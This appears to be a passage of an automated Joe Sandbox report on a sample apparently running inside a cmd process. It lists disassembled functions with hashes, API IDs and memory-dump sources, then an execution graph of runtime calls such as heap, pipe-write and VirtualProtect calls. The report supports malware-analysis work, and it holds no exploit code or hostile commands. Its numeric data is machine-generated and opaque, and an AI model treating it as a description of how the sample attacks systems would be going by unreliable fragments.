                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: B771A336204F81D2EB74DE6A9C593EAA794F38EB86F440016DD6947BC8DE36C60CC749
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: d0d46c7be976de51279b425babb847c39ef603170faee02bdd3b356c71b10852
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: D051D332312E00CBEB56CF15E888F6CB3D1E74AB99F558529DA4A477C8DB78E849C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 71342968754ebf57a61dab2d01e03f6cf991385c9b331b3e52012ff4e0a91bdf
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 33617E32504BC4C2D762DF15E884B9AB7E0F78AB89F044215EB9807BD5CB78E198CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 37c4467977cc6b4475bef7d8872b73b7cd971d32df701a22d2d8131f23ebbb4b
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: BE510426204F91C3FA66CE36AC5C3AAE751F39FB82F540029DD5943BC9DA39C508C758
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 7f9780545fa006001d1a108c18ea2f17ce767833cc83a2264d3e95ab59ca16d1
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: BA51D426208F81C1EA24DE6ABC5D3ABE791F39E781F440225DD6943BC9DA3BC44CC749
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 090a2983caa9a3fed5f6ffcb7dca142642509c02c405c4c9caff4b5905eb5a2e
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 6C41D232625E80C7E751DF65E84879AF7A0F39E785F804121EA8D877D8EB38C509CB58
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 754eb42930d8fef745db3761803914ffea3cdb626823607fd65c5f0bf0d9ae64
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 3341C162625E84C6E720CF65EC0879EF7A0F35D785F840121EA5D877D8EB38D409CB85
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: f12e5941ba082bc6aa0553977c813c124fae4c6a059b74e1c0362ff9798fe760
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 08114932214F80C2EB62CB25F808249B7E1F78DB85F594220EA8D47BA8EF38C555CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 95718bb63fa5952e840400fd337c31440465f615210484942451a3ddddfa944f
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: AB111932214F8082EB21CB15E84835AB7E6F78DB95F584620EE9D07BE4DF39C595CB44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 3464ca51347041b5d842149d6ffe7df07f244bdff1dc0c28ed20f46bb680b17b
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 57116D21A01F80C6EB56CB66E80825DA7A0F78EFD2F594164DE4E537E5EF38D5868304
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 9ec65b994061b47875f6bc3ce72489b00426ebda85f2fc47d6dbb9169a6c580d
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 5511A921A01F80D1EA14CB6AA80D25EB7A0FB8EFD1F584128DE5E577E4EF39D446C348
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 3add5d132651e11d7ce62df7e53bc521d990cbf6c2688cbcbca9f1b1ec5d5601
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 40E03931601E04DBE755CB62DC08349BAE1EB9EB07F458024C909073D0EF7D969D8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: af70f53aa7b6a0a578156c31b53a320462ed1995c391e64304596711f9fe0b5f
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 6CE03931601A04EAF714CB62DC0D35AB6E1EB8DB16F448024C9190B390EF7D949D8781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 4a192c851d1dcc14d2c53a85fc0a7f2611c1b6f5b2e1db6c36f06c96f027904e
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 9CE06D71611D04DBE759CB22DC08248B6A1FB9EB03F458020C909073D0EE38969C9610
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 10fa5def5376a68e355416d68e95cf1ba9ef89bc2c3820dee860d11e8c23b710
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: D2E0ED71611904EAF718DB62DC0D35EB6A1FB8DB16F448024C9190B390EE38949D9655

                                                  Execution Graph

                                                  Execution Coverage:1.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1402
                                                  Total number of Limit Nodes:2
                                                  execution_graph 7575 286d7d21398 7576 286d7d213ae 7575->7576 7577 286d7d213f5 7576->7577 7578 286d7d2140e 7576->7578 7584 286d7d1d1f4 7577->7584 7583 286d7d21405 7578->7583 7590 286d7d1dd78 7578->7590 7598 286d7d1cb10 7584->7598 7587 286d7d1d04c 7666 286d7d1cef8 7587->7666 7591 286d7d1dd97 7590->7591 7592 286d7d1dd9c 7590->7592 7591->7583 7592->7591 7593 286d7d1cab0 _invalid_parameter_noinfo 14 API calls 7592->7593 7594 286d7d1ddb7 7593->7594 7766 286d7d1ffb4 7594->7766 7599 286d7d1cb59 GetLastError 7598->7599 7601 286d7d1cb2f Concurrency::details::SchedulerProxy::DeleteThis 7598->7601 7600 286d7d1cb6c 7599->7600 7603 286d7d1cb8a SetLastError 7600->7603 7604 286d7d1cb87 7600->7604 7606 286d7d1c940 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7600->7606 7602 286d7d1cb54 7601->7602 7607 286d7d1c940 GetLastError 7601->7607 7602->7587 7603->7602 7604->7603 7606->7604 7608 286d7d1c966 7607->7608 7609 286d7d1c96c SetLastError 7608->7609 7625 286d7d1d220 7608->7625 7610 286d7d1c9e5 7609->7610 7610->7602 7613 286d7d1c9a5 FlsSetValue 7616 286d7d1c9c8 7613->7616 7617 286d7d1c9b1 FlsSetValue 7613->7617 7614 286d7d1c995 FlsSetValue 7632 286d7d1d2a0 7614->7632 7638 286d7d1c758 7616->7638 7619 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7617->7619 7622 286d7d1c9c6 SetLastError 7619->7622 7622->7610 7630 286d7d1d231 Concurrency::details::SchedulerProxy::DeleteThis 7625->7630 7626 286d7d1d282 7629 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 7626->7629 7627 286d7d1d266 HeapAlloc 7628 286d7d1c987 7627->7628 7627->7630 7628->7613 7628->7614 7629->7628 7630->7626 7630->7627 7643 286d7d1b470 7630->7643 7633 286d7d1c9a3 7632->7633 7634 286d7d1d2a5 HeapFree 7632->7634 7633->7609 7634->7633 7635 286d7d1d2c0 GetLastError 7634->7635 7636 286d7d1d2cd Concurrency::details::SchedulerProxy::DeleteThis 7635->7636 7637 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7636->7637 7637->7633 7652 286d7d1c630 7638->7652 7646 286d7d1b4c0 7643->7646 7651 286d7d1c558 EnterCriticalSection 7646->7651 7664 286d7d1c558 EnterCriticalSection 7652->7664 7667 286d7d1cf23 7666->7667 7674 286d7d1cf94 7667->7674 7669 286d7d1cf4a 7671 286d7d1cf6d 7669->7671 7684 286d7d1c3e0 7669->7684 7672 286d7d1cf82 7671->7672 7673 286d7d1c3e0 _invalid_parameter_noinfo 17 API calls 7671->7673 7672->7583 7673->7672 7697 286d7d1ccc8 7674->7697 7680 286d7d1cfcf 7680->7669 7685 286d7d1c438 7684->7685 7686 286d7d1c3ef GetLastError 7684->7686 7685->7671 7687 286d7d1c404 7686->7687 7688 286d7d1cba0 _invalid_parameter_noinfo 14 API calls 7687->7688 7689 286d7d1c41e SetLastError 7688->7689 7689->7685 7690 286d7d1c441 7689->7690 7691 286d7d1c3e0 _invalid_parameter_noinfo 15 API calls 7690->7691 7692 286d7d1c467 7691->7692 7737 286d7d1ffe8 7692->7737 7698 286d7d1cd1f 7697->7698 7699 286d7d1cce4 GetLastError 7697->7699 7698->7680 7703 286d7d1cd34 7698->7703 7700 286d7d1ccf4 7699->7700 7710 286d7d1cba0 7700->7710 7704 286d7d1cd68 7703->7704 7705 286d7d1cd50 GetLastError SetLastError 7703->7705 7704->7680 7706 286d7d1d06c IsProcessorFeaturePresent 7704->7706 7705->7704 7707 286d7d1d07f 7706->7707 7715 286d7d1cd80 7707->7715 7711 286d7d1cbc8 FlsGetValue 7710->7711 7713 286d7d1cbc4 7710->7713 7711->7713 7712 286d7d1cbde SetLastError 7712->7698 7713->7712 7714 286d7d1c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7713->7714 7714->7712 7716 286d7d1cdba _invalid_parameter_noinfo 7715->7716 7717 286d7d1cde2 RtlCaptureContext RtlLookupFunctionEntry 7716->7717 7718 286d7d1ce2e RtlVirtualUnwind 7717->7718 7719 286d7d1ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7717->7719 7718->7719 7720 286d7d1ceb6 _invalid_parameter_noinfo 7719->7720 7723 286d7d18070 7720->7723 7724 286d7d18079 7723->7724 7725 286d7d18084 GetCurrentProcess TerminateProcess 7724->7725 7726 286d7d18848 IsProcessorFeaturePresent 7724->7726 7727 286d7d18860 7726->7727 7732 286d7d1891c RtlCaptureContext 7727->7732 7733 286d7d18936 RtlLookupFunctionEntry 7732->7733 7734 286d7d1894c RtlVirtualUnwind 7733->7734 7735 286d7d18873 7733->7735 7734->7733 7734->7735 7736 286d7d18814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7735->7736 7738 286d7d1c48f 7737->7738 7739 286d7d20001 7737->7739 7741 286d7d20054 7738->7741 7739->7738 7745 286d7d20a40 7739->7745 7742 286d7d2006d 7741->7742 7743 286d7d1c49f 7741->7743 7742->7743 7763 286d7d1e8c4 7742->7763 7743->7671 7754 286d7d1cab0 7745->7754 7747 286d7d20a4f 7753 286d7d20a95 7747->7753 7762 286d7d1c558 EnterCriticalSection 7747->7762 7753->7738 7755 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7754->7755 7757 286d7d1cab9 7755->7757 7756 286d7d1cabe 7756->7747 7757->7756 7758 286d7d1cae8 FlsGetValue 7757->7758 7760 286d7d1cae4 7757->7760 7758->7760 7759 286d7d1cafe 7759->7747 7760->7759 7761 286d7d1c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7760->7761 7761->7759 7764 286d7d1cab0 _invalid_parameter_noinfo 14 API calls 7763->7764 7765 286d7d1e8cd 7764->7765 7767 286d7d1ffc9 7766->7767 7768 286d7d1ddda 7766->7768 7767->7768 7769 286d7d20a40 _invalid_parameter_noinfo 14 API calls 7767->7769 7770 286d7d20020 7768->7770 7769->7768 7771 286d7d20035 7770->7771 7773 286d7d20048 7770->7773 7772 286d7d1e8c4 _invalid_parameter_noinfo 14 API calls 7771->7772 7771->7773 7772->7773 7773->7591 9074 286d7d1c218 9075 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9074->9075 9076 286d7d1c228 9075->9076 9077 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9076->9077 9078 286d7d1c23c 9077->9078 9079 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9078->9079 9080 286d7d1c250 9079->9080 9081 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9080->9081 9082 286d7d1c264 9081->9082 8304 286d7d12518 GetProcessIdOfThread GetCurrentProcessId 8305 286d7d125be 8304->8305 8306 286d7d12543 CreateFileW 8304->8306 8306->8305 8307 286d7d12577 WriteFile ReadFile CloseHandle 8306->8307 8307->8305 7774 286d7d2479d 7777 286d7d1af34 7774->7777 7778 286d7d1af4e 7777->7778 7780 286d7d1af9b 7777->7780 7778->7780 7781 286d7d19324 7778->7781 7784 286d7d19340 7781->7784 7783 286d7d1932d 7783->7780 7785 286d7d19358 7784->7785 7786 286d7d1935f GetLastError 7784->7786 7785->7783 7796 286d7d19c8c 7786->7796 7800 286d7d19aac 7796->7800 7801 286d7d19b96 TlsGetValue 7800->7801 7807 286d7d19af0 __vcrt_FlsAlloc 7800->7807 7802 286d7d19b1e LoadLibraryExW 7804 286d7d19bbd 7802->7804 7805 286d7d19b3f GetLastError 7802->7805 7803 286d7d19bdd GetProcAddress 7803->7801 7804->7803 7806 286d7d19bd4 FreeLibrary 7804->7806 7805->7807 7806->7803 7807->7801 7807->7802 7807->7803 7808 286d7d19b61 LoadLibraryExW 7807->7808 7808->7804 7808->7807 9083 286d7d1f820 9086 286d7d1f7d8 9083->9086 9091 286d7d1c558 EnterCriticalSection 9086->9091 9092 286d7d1fe20 9093 286d7d1fe4a 9092->9093 9094 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9093->9094 9095 286d7d1fe6a 9094->9095 9096 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9095->9096 9097 286d7d1fe78 9096->9097 9098 286d7d1fea2 9097->9098 9099 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9097->9099 9100 286d7d1fec1 InitializeCriticalSectionEx 9098->9100 9103 286d7d1feab 9098->9103 9101 286d7d1fe94 9099->9101 9100->9098 9102 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9101->9102 9102->9098 8308 286d7d14320 8310 286d7d1426d 8308->8310 8309 286d7d142bd VirtualQuery 8309->8310 8311 286d7d142d7 8309->8311 8310->8309 8310->8311 8312 286d7d14322 GetLastError 8310->8312 8312->8310 8546 286d7d15c8d 8548 286d7d15c94 8546->8548 8547 286d7d15cfb 8548->8547 8549 286d7d15d77 VirtualProtect 8548->8549 8550 286d7d15db1 8549->8550 8551 286d7d15da3 GetLastError 8549->8551 8551->8550 8313 286d7d18f0c 8320 286d7d1946c 8313->8320 8319 286d7d18f19 8321 286d7d19474 8320->8321 8323 286d7d194a5 8321->8323 8325 286d7d18f15 8321->8325 8337 286d7d19d28 8321->8337 8324 286d7d194b4 __vcrt_uninitialize_locks DeleteCriticalSection 8323->8324 8324->8325 8325->8319 8326 286d7d19400 8325->8326 8342 286d7d19bfc 8326->8342 8338 286d7d19aac __vcrt_FlsAlloc 5 API calls 8337->8338 8339 286d7d19d5e 8338->8339 8340 286d7d19d73 InitializeCriticalSectionAndSpinCount 8339->8340 8341 